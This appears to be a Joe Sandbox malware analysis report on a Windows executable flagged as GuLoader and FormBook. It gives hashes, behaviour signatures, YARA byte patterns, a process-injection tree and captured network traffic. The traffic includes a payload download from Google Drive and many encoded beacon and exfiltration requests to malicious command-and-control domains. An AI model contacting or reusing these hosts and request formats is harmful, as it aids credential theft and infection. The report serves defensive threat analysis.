Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:hesaphareketi-01.exe
Analysis ID:1353023
MD5:e96bd1c59a8e67c4ab01a9327c98aab7
SHA1:184bfeb63316cb4aec59ee6038e1f0912541cbe9
SHA256:0b145928bcccd1f9510ef2744ef2487a38cdcdcc6b8595995c491c29f97f55e9
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • hesaphareketi-01.exe (PID: 9444 cmdline: C:\Users\user\Desktop\hesaphareketi-01.exe MD5: E96BD1C59A8E67C4AB01A9327C98AAB7)
    • hesaphareketi-01.exe (PID: 1380 cmdline: C:\Users\user\Desktop\hesaphareketi-01.exe MD5: E96BD1C59A8E67C4AB01A9327C98AAB7)
      • iyGEtqCQDnvMouCuszv.exe (PID: 3712 cmdline: "C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 8480 cmdline: C:\Windows\SysWOW64\SearchProtocolHost.exe MD5: 7C22FED393CA0330A10B47848018C225)
          • firefox.exe (PID: 9228 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x279f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x4d2cf:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x3947e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 8 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://www.dabblefurnishings.space/uaaq/Avira URL Cloud: Label: malware
        Source: http://www.foodpackaging-jobs07.xyz/uaaq/Avira URL Cloud: Label: malware
        Source: http://www.infinite-7.com/uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw==Avira URL Cloud: Label: malware
        Source: http://www.foodpackaging-jobs07.xyz/uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907Avira URL Cloud: Label: malware
        Source: http://www.infinite-7.com/uaaq/Avira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: www.dabblefurnishings.spaceVirustotal: Detection: 7%Perma Link
        Multi AV Scanner detection for submitted file
        Source: hesaphareketi-01.exeVirustotal: Detection: 18%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: hesaphareketi-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.30:49748 version: TLS 1.2
        Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdb source: SearchProtocolHost.exe
        Source: Binary string: SearchProtocolHost.pdbUGP source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: SearchProtocolHost.pdb source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DAC020 FindFirstFileW,FindNextFileW,FindClose,19_2_02DAC020
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD50FF
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FCA32F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC946F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD708F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FD708E
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then xor eax, eax12_2_00FCF26F
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC9468
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then mov esp, ebp12_2_00FC9548
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 4x nop then pop edi12_2_00FC9F5F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then pop edi19_2_02DA17B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax19_2_02D99990

        Networking

        barindex
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.foodpackaging-jobs07.xyz
        Source: DNS query: www.spark-tech-global.xyz
        Source: DNS query: www.tunug.xyz
        Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FCA32F getaddrinfo,setsockopt,recv,recv,12_2_00FCA32F
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5uqa5maj4frjtgk9skbeu3peo/1701687750000/14166578405435855174/*/1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ?e=download&uuid=e13d7ba5-3bd0-48f6-b701-0767cd5a3c67 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0g-ag-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1Host: www.90dayleaderlab.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1Host: www.foodpackaging-jobs07.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1Host: www.rocsys.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1Host: www.tubidy.techAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1Host: www.infinite-7.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1Host: www.resolution-pj.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1Host: www.atlasmisc.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.mariannaserocka.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1Host: www.spark-tech-global.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.ayotundewrites.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA== HTTP/1.1Host: www.viough.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907 HTTP/1.1Host: www.luciengeorge.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=c+6TcgwS74LYb/BtPGzNqx0v24f4gkgpuEv8j4KmZe3KWMq5Vv4U79mpWhSZrgbcOhaTjzTbW4/9rezZQ6Dag7ZY/b6dvvuFMQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.tunug.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZOLuwQ4GbhudklNTaAF4CqvaFcPUnb+ksfYc3Sr7bbbYZkY3qV8I6hFKN8xphgAEys4W8UAai/ACKckVxru298r+LRMvoVTRoA== HTTP/1.1Host: www.dabblefurnishings.spaceAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx6907 HTTP/1.1Host: www.projectmerdeka.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1Host: www.90dayleaderlab.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1Host: www.foodpackaging-jobs07.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1Host: www.rocsys.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=+fLke0FkZ8ddpf91rSuK7zl5QINwJbdABoU0VkbbyogRs1jBfiuiWgTdT60Kd54wcvqO12MKWygzxtqc9m8Iy6fCV4+OuKKc/Q==&XFs82=6R5Xx6907 HTTP/1.1Host: www.tubidy.techAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1Host: www.infinite-7.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1Host: www.resolution-pj.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=FvUhDsBmpCJoj3lGkDh7rJRDQZ/xWYuOs9BV8EopI6SMYb/NSZXNOV1HCqXbeEBh5mla6CDOuwUwzd7BjgPBM1LiYO3UkBsWTw== HTTP/1.1Host: www.atlasmisc.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.mariannaserocka.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1Host: www.spark-tech-global.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1Host: www.ayotundewrites.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /uaaq/ HTTP/1.1Host: www.foodpackaging-jobs07.xyzAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.foodpackaging-jobs07.xyzReferer: http://www.foodpackaging-jobs07.xyz/uaaq/Cache-Control: no-cacheConnection: closeContent-Length: 186Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 70 6e 4d 43 5a 73 37 2f 71 59 39 72 63 61 63 59 56 36 75 39 77 65 6b 7a 35 5a 6f 6b 6e 6c 6c 51 77 34 6f 58 4a 37 66 37 76 50 59 49 2f 72 55 74 37 66 51 33 59 6c 44 44 4e 6a 46 54 73 6a 64 75 7a 52 38 37 51 63 72 6c 30 4e 67 49 35 6f 77 41 4c 5a 70 47 6d 37 77 4c 56 64 43 66 37 41 69 30 53 61 35 63 67 42 58 53 51 47 30 52 57 34 32 4f 51 48 73 70 35 67 55 63 31 58 43 44 63 72 37 48 39 42 42 49 36 43 37 61 6a 35 39 6c 4d 58 46 46 34 43 4c 34 4b 68 47 63 4a 30 39 48 58 4d 77 5a 45 45 36 37 32 51 3d 3d Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:48 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:04:50 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:08:13 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
